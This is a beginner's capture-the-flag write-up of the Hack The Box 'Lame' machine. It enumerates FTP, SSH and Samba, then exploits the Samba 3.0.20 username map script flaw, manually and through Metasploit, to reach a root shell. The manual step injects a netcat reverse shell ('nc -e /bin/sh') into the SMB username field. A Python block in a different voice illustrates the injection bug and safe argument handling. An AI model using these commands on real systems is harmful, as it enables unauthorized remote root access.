HTB- Lame

Rajan Kshedal
5 min read · Jul 24, 2022

This is my first CTF on Hack The Box. If you don’t know what it is, in short it’s a platform for people interested in cybersecurity to learn, hone their skills and practice their knowledge. Check it out, it’s awesome, and many modules and machines are free, so you can learn a lot from it.

The Lame machine has difficulty level easy, so it should be easy to solve, I guess. Let’s start and find out.

We start with our pentest 101 methodology (I made it up, there is no such thing):
- ENUMERATE
- SEARCH FOR VULNERABILITY
- EXPLOIT IT AND GAIN ACCESS

That’s it, do these 3 things and you are a hacker HAHA. Ok, let’s start with enumeration. For enumeration, I choose you, Nmap!

Nmap scan output:

Here we can see there are 4 open ports, which are pretty much standard services like FTP, SSH and Samba.

We see that FTP allows anonymous login, so let’s check what it has for us.
Sadly nothing, it doesn’t have anything. Next we can see an SSH service is running, and I honestly don’t think that version is vulnerable. So I moved to our next port, which is Server Message Block, known as SMB on Windows and Samba on UNIX. For those who don’t know what Server Message Block is or what it does: it is a client-server protocol that provides access to resources such as files, printers and serial interfaces, and facilitates communication between network processes.

Now we grabbed its version, which is 3.0.20. Now, boys and girls, time to put in some effort and do some hard work.

Yes, googling is hard. As we can see, there is a command execution vulnerability in this version, and the rapid7 result means we can use Metasploit too. We will do that as well, but let’s try the manual way first, because even if a target is vulnerable, sometimes the ready-made exploit doesn’t work. So it is always a good habit to understand how to do it manually.

Let’s enumerate Samba further, and for that we will use the smbclient command. We will try to log in anonymously, meaning without providing a username or password. Quick note: we could use enum4linux to enumerate Samba further, but let’s do it manually.

smbclient -N -L <IP>

Let’s break the command:

smbclient : This command is used to communicate with an SMB server.
-N : This flag suppresses the normal password prompt from the client to the user.
-L : This flag lists the services (shares) that are available on a server.

We can see a number of shares, but what interests us the most is the tmp share, because it has the comment "oh hoes!"... no, it’s "oh noes!". That share is writable, which means we can write to that folder. We can connect to that share using the following command:

smbclient //<ip>/tmp

Press enter after you execute this command and you will see the following interface:

Now let’s understand what this vulnerability is and how to exploit it. For that we can read the exploit description here: https://www.exploit-db.com/exploits/16320 . In short: "This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands."
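To make the root cause concrete, here is an added example (my own illustration, not code from Samba or from this post) of the bug class behind this advisory: an untrusted username spliced into a shell command line versus the same lookup done with validation and no shell. The mapper path `/usr/local/sbin/map_user.sh` and the helper names are assumptions.

```python
import re
import shlex
import subprocess

# Samba's "username map script" option runs an administrator-supplied command
# with the client-supplied username substituted in. If that username is spliced
# into a shell command line, shell metacharacters in it become part of the
# command, which is the root cause of the Samba 3.0.20 issue described above.

# Hypothetical mapper program (an assumption; not a path from Samba or this post).
MAP_SCRIPT = "/usr/local/sbin/map_user.sh"

# Only allow a conservative character set; everything else is refused outright.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def build_unsafe_command(username: str) -> str:
    """Vulnerable pattern: plain string concatenation destined for `sh -c`.
    Returned as a string only to make the injection point visible; never run here."""
    return f"{MAP_SCRIPT} {username}"


def build_quoted_command(username: str) -> str:
    """If a shell is unavoidable, quote the untrusted value so the shell treats
    it as one literal word (backticks, $(), ; and | lose their meaning)."""
    return f"{MAP_SCRIPT} {shlex.quote(username)}"


def build_safe_argv(username: str, mapper: str = MAP_SCRIPT) -> list[str]:
    """Preferred pattern: validate, then hand the username to the program as a
    single argv element so no shell ever parses it."""
    if SAFE_USERNAME.fullmatch(username) is None:
        raise ValueError(f"rejected username: {username!r}")
    return [mapper, username]


def run_mapper(argv: list[str]) -> str:
    """Execute argv with shell=False (no shell involved) and return stdout."""
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout.strip()
```

Passing `echo` as the mapper shows that even a username full of backticks stays a literal argument once no shell is in the path.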

You can always google the terms which you don’t know about like shell meta characters. Go on try it. I won’t tell you everything.

Now we can see what that exploit is doing: it logs in with this username. Let’s copy it: "/=`nohup `"

Now let’s do it.

Here you can see I first used the following command after connecting to the SMB server:

logon "/=`nohup nc -e /bin/sh <myip> <port>`"

Then split the window, start a netcat listener on the same port you specified in the logon command, and press enter on the logon command.

Voila! You now have a shell with root privileges on the machine, and you can spawn a TTY shell using the following command:

python3 -c 'import pty; pty.spawn("/bin/bash")'

(If the target only has an older Python, the same one-liner works with python instead of python3.)

Now let’s do the same thing using Metasploit. Go on, start your Metasploit and search for samba 3.0.20 exploits:

use 0

options

set RHOST <MACHINE IP>

set LHOST <YOUR VPN IP>

All set, now you are good to go. Type run and you will have your shell.

There you have it, your shell with root access. Now search for the flags and that’s it. You have solved the HTB Lame CTF.

In this CTF we learned about different services, how to search for exploits, manual exploitation, Metasploit, the Samba service, Samba enumeration, the Samba exploit and smbclient.
Thank you HTB and the creator of this room for this amazing CTF. That’s it for this blog, I will write again soon. Make sure you follow me HEHEHE. Till then, bye bye, keep learning, keep hacking ❤.

Rajan Kshedal

Cybersecurity enthusiast, noob programmer and after joining medium probably a writer too HAHAHA